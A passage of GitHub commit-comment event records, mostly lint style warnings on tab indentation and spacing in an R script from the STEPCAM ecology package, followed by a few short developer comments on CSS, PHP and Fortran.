pool_richness\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n^\n```\n[R/generateArtificialData.R:33:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **lines should not be more than 80 characters.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:33:25:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                       ~^~~\n```\n[R/generateArtificialData.R:33:34:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                 ^\n```\n[R/generateArtificialData.R:33:61:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                           ~^~\n```\n[R/generateArtificialData.R:33:69:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                    ^~\n```\n[R/generateArtificialData.R:33:74:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                        ~^~\n```\n[R/generateArtificialData.R:33:76:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                           ^\n```\n[R/generateArtificialData.R:33:89:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values <- round((rnorm(n_communities, mean = 0, sd = 1) * (sd_richness * pool_richness) +\n                                                                                       ~^~\n```\n[R/generateArtificialData.R:34:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor(i in 1:n_communities){\n^\n```\n[R/generateArtificialData.R:35:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L35) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  if(mechanism_random == T){\n^\n```\n[R/generateArtificialData.R:35:47:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                             ~^~\n```\n[R/generateArtificialData.R:35:65:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L35) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values > pool_richness)] <- pool_richness\n                                                               ~^~~\n```\n[R/generateArtificialData.R:36:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L36) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:36:47:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L36) *style:* **Put spaces around all infix operators.**\n```r\n​\trichness_values[which(richness_values < 0)] <- 0\n                                             ~^\n```\n[R/generateArtificialData.R:37:12:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L37) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor(i in 1:n_communities){\n           ^\n```\n[R/generateArtificialData.R:38:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L38) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  }else{\n^\n```\n[R/generateArtificialData.R:38:13:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L38) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t  if(mechanism_random == T){\n            ^\n```\n[R/generateArtificialData.R:39:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L39) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n^\n```\n[R/generateArtificialData.R:39:29:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L39) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:40:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L40) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- c()\n^\n```\n[R/generateArtificialData.R:41:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L41) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(j in 1:n_traits){\n^\n```\n[R/generateArtificialData.R:42:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L42) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      for(k in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:42:24:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                      ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/9694c6822269b3c41c1358f3f5545de295aeb16c/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n"}},"created_at":"2016-09-20T09:44:21Z"}
{"id":"4588567593","type":"CommitCommentEvent","actor":{"login":"likailee"},"repo":{"name":"likailee/CarouselDemo"},"payload":{"comment":{"id":19093471,"position":null,"line":null,"path":null,"commit_id":"9cf73d0b2515fa684de82815e937c9d0af38608b","created_at":"2016-09-20T09:44:23Z","updated_at":"2016-09-20T09:44:23Z","body":"CSS 重置 未添加HTML5支持样式"}},"created_at":"2016-09-20T09:44:23Z"}
{"id":"4588568017","type":"CommitCommentEvent","actor":{"login":"Join-GitHub-Now"},"repo":{"name":"Join-GitHub-Now/Advanced-PHP-MVC-Blog-System"},"payload":{"comment":{"id":19093473,"position":66,"line":66,"path":"blog/vendor/system/Application.php","commit_id":"2a1e2deac3d54ae2939c500072bf88575bfd9fa6","created_at":"2016-09-20T09:44:28Z","updated_at":"2016-09-20T09:44:28Z","body":"Line 64 I worked out to be the issue."}},"created_at":"2016-09-20T09:44:28Z"}
{"id":"4588570716","type":"CommitCommentEvent","actor":{"login":"CaddyDz"},"repo":{"name":"13makk37/Random"},"payload":{"comment":{"id":19093479,"position":4,"line":11,"path":"fortran hello.f90","commit_id":"3bba43a87bbbe60369acb5a47e46543ea85931b6","created_at":"2016-09-20T09:45:01Z","updated_at":"2016-09-20T09:45:01Z","body":"This will remain one of the languages I'll never bother learning :sleeping: "}},"created_at":"2016-09-20T09:45:01Z"}
{"id":"4588574036","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-core"},"payload":{"comment":{"id":19093484,"position":null,"line":null,"path":null,"commit_id":"e6fc3869109c616db5030b6fd9e277a2e39ef3b5","created_at":"2016-09-20T09:45:39Z","updated_at":"2016-09-20T09:45:39Z","body":"Thanks!"}},"created_at":"2016-09-20T09:45:39Z"}
{"id":"4588574052","type":"CommitCommentEvent","actor":{"login":"BIgerMe"},"repo":{"name":"BIgerMe/PHP"},"payload":{"comment":{"id":19093485,"position":null,"line":null,"path":null,"commit_id":"cfb80b41ed83014329cdba6dadf5299e6b91ef2f","created_at":"2016-09-20T09:45:39Z","updated_at":"2016-09-20T09:45:39Z","body":"array_push(aaa,$aaa),推送值"}},"created_at":"2016-09-20T09:45:39Z"}
